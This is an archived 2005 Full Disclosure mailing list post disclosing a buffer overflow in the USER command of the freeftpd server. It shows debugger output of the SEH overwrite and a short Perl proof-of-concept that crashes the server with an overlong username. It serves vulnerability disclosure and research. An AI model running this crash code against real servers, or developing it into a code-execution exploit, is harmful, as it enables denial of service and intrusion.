Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

freeftpd USER bufferoverflow

From: barabas mutsonline <barbsie () gmail com>
Date: Wed, 16 Nov 2005 10:56:54 +0100
Hi,
 While drooling over my new Adriana Lima wallpaper, my tongue accidentally
hit my keyboard and more than 1012 chars were sent to the login screen of my
freeftpd server (which i use to backup my Adriana Lima pics). Guess
what...the server crashed! Luckily I attach ollydbg to every process I have
running and ths is what I found:
 ECX 50505050
 EIP 77C460CB msvcrt.77C460CB
Log data, item 0
Address=77C460CB
Message=Access violation when reading [50505050]
 77C460CB 8B01 MOV EAX,DWORD PTR DS:[ECX]
 well, eip doesnt get overwritten, but SEH does:

0012B6CC 41414141
0012B6D0 42424242
0012B6D4 42424242
0012B6D8 43434343 Pointer to next SEH record
0012B6DC 47464544 SE handler

EIP 47464544

Log data, item 0
Address=47464544
Message=Access violation when executing [47464544]
 I leave the exploit coding as an exercise...
 enjoy
 sample crash code:

#!/usr/bin/perl -w
#freeftpd USER buffer overflow
#barabas - 2005

use strict;
use Net::FTP;
my $user="\x41"x1011;
$user .="\x44\x45\x46\x47";#overwrite SEH
$user .="\x50"x400;

my $ftp = Net::FTP->new("127.0.0.1 <http://127.0.0.1>", Debug => 1);
$ftp->login("$user","whatevah");

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: